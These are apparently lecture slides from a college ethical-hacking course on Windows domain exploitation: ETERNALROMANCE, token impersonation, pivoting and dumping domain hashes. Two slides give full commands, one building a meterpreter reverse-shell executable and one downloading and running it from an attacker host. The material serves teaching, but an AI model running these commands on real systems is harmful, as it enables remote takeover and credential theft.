Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
CNIT 124:
Advanced Ethical
Hacking
Ch 6: Finding Vulnerabilities
and Exploiting Domains
Topics
Nessus
Nessus DROWN Scan
Nessus DROWN Scan
Nmap
Two Windows Network Types
• Workgroup
• Small business or home
• Less than 10 computers
• Domain
• Requires a server as a ...
Active Directory Domain Services
Forest
Forest Functional Level
Active Directory Users and Computers
Local Login
• ComputerNameUsername
• Password hash stored on local C: drive
Domain Login
• DomainNameUsername
• Password hash stored on Domain Controller
Group Policy
Make Domain User Sally
a Local Administrator
GPUPDATE /FORCE
Sally is an Administrator
Enumerate Named Pipes
ETERNALROMANCE Exploit
PoC: Create C:pwned.txt
PoC: Create C:pwned.txt
Create Malware as Service EXE
• msfvenom -p windows/meterpreter/reverse_tcp
LHOST=172.16.1.188 -f exe-service > /var/www/
...
Command Line to Download
and Run Malware
• cmd /c bitsadmin /transfer wcb /priority high
http://172.16.1.188/shell-service...
Incognito
Tokens
• Like ID cards
• Windows uses them to mark who is running each
process
Task Manager
Domain
Controller
Member
Server
Direct
Attack
Pivoting
Domain
Controller
Member
Server
Windows Firewall
Scope Includes Attacker
Metasploit Autoroute
Member Server
Incognito
Impersonate Token
Become Domain Admin
current_user_psexec
Domain Hashes
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
Upcoming SlideShare
Loading in …5
×

CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains

450 views

Published on

Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne

Course Web page:

https://samsclass.info/124/124_F17.shtml

Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)

Published in: Education
  • Be the first to comment

  • Be the first to like this

CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains

  1. 1. CNIT 124: Advanced Ethical Hacking Ch 6: Finding Vulnerabilities and Exploiting Domains
  2. 2. Topics
  3. 3. Nessus
  4. 4. Nessus DROWN Scan
  5. 5. Nessus DROWN Scan
  6. 6. Nmap
  7. 7. Two Windows Network Types • Workgroup • Small business or home • Less than 10 computers • Domain • Requires a server as a Domain Controller • Central point of administration
  8. 8. Active Directory Domain Services
  9. 9. Forest
  10. 10. Forest Functional Level
  11. 11. Active Directory Users and Computers
  12. 12. Local Login • ComputerNameUsername • Password hash stored on local C: drive
  13. 13. Domain Login • DomainNameUsername • Password hash stored on Domain Controller
  14. 14. Group Policy
  15. 15. Make Domain User Sally a Local Administrator
  16. 16. GPUPDATE /FORCE
  17. 17. Sally is an Administrator
  18. 18. Enumerate Named Pipes
  19. 19. ETERNALROMANCE Exploit
  20. 20. PoC: Create C:pwned.txt
  21. 21. PoC: Create C:pwned.txt
  22. 22. Create Malware as Service EXE • msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/ html/shell-service.exe
  23. 23. Command Line to Download and Run Malware • cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:shell- service.exe && C:shell-service.exe
  24. 24. Incognito
  25. 25. Tokens • Like ID cards • Windows uses them to mark who is running each process
  26. 26. Task Manager
  27. 27. Domain Controller Member Server Direct Attack
  28. 28. Pivoting Domain Controller Member Server
  29. 29. Windows Firewall
  30. 30. Scope Includes Attacker
  31. 31. Metasploit Autoroute
  32. 32. Member Server
  33. 33. Incognito
  34. 34. Impersonate Token Become Domain Admin
  35. 35. current_user_psexec
  36. 36. Domain Hashes

×